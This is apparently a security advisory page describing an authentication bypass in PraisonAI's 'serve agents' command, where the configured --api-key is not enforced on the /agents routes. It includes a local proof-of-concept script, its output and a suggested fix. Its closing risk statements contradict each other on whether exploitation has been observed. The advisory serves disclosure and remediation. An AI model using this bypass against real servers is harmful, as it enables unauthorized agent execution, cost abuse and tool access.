Know every vulnerabilitybefore it knows you.
DevGuard continuously monitors your dependencies and alerts you when CVEs like this one affect your stack — with real-time threat intelligence built for developers.
PYSEC-2026-3887
Summary
PraisonAI's praisonai serve agents command exposes --api-key as the documented
authentication control for production/external deployments, but the configured key is not
enforced on the public agent invocation compatibility endpoints.
An operator can start the server with --api-key and bind it to 0.0.0.0, but any network-
reachable caller can still invoke agents through POST /agents or POST /agents/ {agent_name} without Authorization, X-API-Key, a query token, or any other credential.
Confirmed vulnerable:
- v4.6.48 / commit
d5f1114aaf1a2e9f121a6e66b929149ca2201f1d - v4.6.34 / commit
e5928449f73f66cc8af1de61621aa974ab255133
Likely affected range: >= 4.6.34, <= 4.6.48.
This is distinct from CVE-2026-44338 / GHSA-6rmh-7xcm-cpxj, which covered the legacy Flask
api_server.py path before 4.6.34. This report concerns the newer FastAPI serve agents --api-key code path and is confirmed in v4.6.48.
Details
The CLI accepts and forwards an API key:
src/praisonai/praisonai/cli/commands/serve.py:156definespraisonai serve agentssrc/praisonai/praisonai/cli/commands/serve.py:162exposes--api-keysrc/praisonai/praisonai/cli/commands/serve.py:175-176forwards the supplied keysrc/praisonai/praisonai/cli/features/serve.py:191handles theagentssubcommandsrc/praisonai/praisonai/cli/features/serve.py:199parsesapi_keyinto the config
However, _create_agents_app() never uses config["api_key"] to create middleware or a
FastAPI auth dependency:
src/praisonai/praisonai/cli/features/serve.py:228creates the FastAPI appsrc/praisonai/praisonai/cli/features/serve.py:287registersPOST {path}with no auth dependencysrc/praisonai/praisonai/cli/features/serve.py:346registersPOST /agents/{agent_name}with no auth dependencysrc/praisonai/praisonai/cli/features/serve.py:356-370executes the registered agent directly
The same app also mounts praisonai.api.agent_invoke, whose /api/v1/agents/{agent_id}/ invoke route is protected separately by CALL_SERVER_TOKEN. That means the protected / api/v1 route and the unauthenticated /agents compatibility routes coexist in the same
server. Setting --api-key does not protect the compatibility routes.
PoC
This local-only PoC does not open a network listener and does not call an LLM provider. It
constructs the FastAPI app through the real ServeHandler._create_agents_app() path with
api_key set, registers a fake agent, and sends an unauthenticated request using FastAPI
TestClient.
#!/usr/bin/env python3
from __future__ import annotations
import sys
import tempfile
from pathlib import Path
REPO = Path("/path/to/PraisonAI")
sys.path[:0] = [
str(REPO / "src" / "praisonai"),
str(REPO / "src" / "praisonai-agents"),
]
class FakeAgent:
def __init__(self):
self.calls = []
def start(self, query):
self.calls.append(query)
return f"fake-agent-ran:{query}"
def main() -> None:
from fastapi.testclient import TestClient
from praisonai.cli.features.serve import ServeHandler
from praisonai.api import agent_invoke
with tempfile.TemporaryDirectory() as tmp:
agents_yaml = Path(tmp) / "agents.yaml"
agents_yaml.write_text(
"roles:\n"
" placeholder:\n"
" role: Placeholder\n"
" goal: Placeholder\n"
" backstory: Placeholder\n",
encoding="utf-8",
)
handler = ServeHandler()
app = handler._create_agents_app(
{
"file": str(agents_yaml),
"host": "0.0.0.0",
"port": 8000,
"path": "/agents",
"reload": False,
"api_key": "operator-secret-api-key",
}
)
fake_agent = FakeAgent()
agent_invoke.register_agent("poc", fake_agent)
client = TestClient(app)
response = client.post(
"/agents/poc",
json={"query": "unauthenticated request"},
)
print(f"STATUS_CODE={response.status_code}")
print(f"RESPONSE_JSON={response.json()!r}")
print(f"AGENT_CALLS={fake_agent.calls!r}")
print(f"UNAUTHENTICATED_AGENT_EXECUTED={fake_agent.calls == ['unauthenticated
request']}")
if __name__ == "__main__":
main()
Run:
cd /path/to/PraisonAI
python3 praisonai-serve-agents-api-key-bypass.py
Observed output:
STATUS_CODE=200
RESPONSE_JSON={'response': 'fake-agent-ran:unauthenticated request'}
AGENT_CALLS=['unauthenticated request']
UNAUTHENTICATED_AGENT_EXECUTED=True
The important condition is that the app was configured with:
"api_key": "operator-secret-api-key"
but the request was sent without any auth header:
client.post("/agents/poc", json={"query": "unauthenticated request"})
The agent still executed and returned HTTP 200.
### Impact
Any attacker who can reach a praisonai serve agents server can invoke configured agents even
when the operator explicitly configured --api-key.
Impact depends on the configured agents and their tools, but can include:
- unauthorized LLM/API usage and provider cost consumption;
- execution of agent workflows;
- access to connected tool integrations;
- reads/writes through file, database, cloud, browser, MCP, or messaging tools;
- availability impact from repeated or long-running agent invocations.
This is especially risky because the documented production pattern recommends using --api-
key when binding the server publicly.
### Suggested fix
Fail closed when --api-key is configured and require it on every agent invocation route in
the serve agents app.
Recommended changes:
- In _create_agents_app(), derive an auth dependency from config.get("api_key").
- Apply it to both POST {path} and POST /agents/{agent_name}.
- Prefer Authorization: Bearer <api_key>. Optionally also support X-API-Key for
compatibility.
- Use constant-time comparison for the expected key.
- Clarify or unify the relationship between --api-key and CALL_SERVER_TOKEN.
- Add tests proving:
- key configured + no header returns 401/403;
- key configured + wrong header returns 401/403;
- key configured + correct header executes;
- both /agents and /agents/{agent_name} are covered.
Upload your own SBOM in CycloneDX 1.6 or higher (JSON) directly here to check your vulnerabilities.
Drag and drop some file here, or click to select
The vulnerability can be exploited over the network without needing physical access. It is easy for an attacker to exploit this vulnerability. An attacker does not need any special privileges or access rights. No user interaction is needed for the attacker to exploit this vulnerability. The impact is confined to the system where the vulnerability exists. There is a low impact on the confidentiality of the information. There is a low impact on the integrity of the data. There is a high impact on the availability of the system.
Exploitation activity has been observed. Apply available patches or mitigations urgently.
The exploit probability is very low. The vulnerability is unlikely to be exploited in the next 30 days.
We did not find any exploit available. Neither in GitHub repositories nor in the Exploit-Database.
Browse More
Continuously monitor your dependencies and get alerted when vulnerabilities like this one affect your stack.
Checkout DevGuard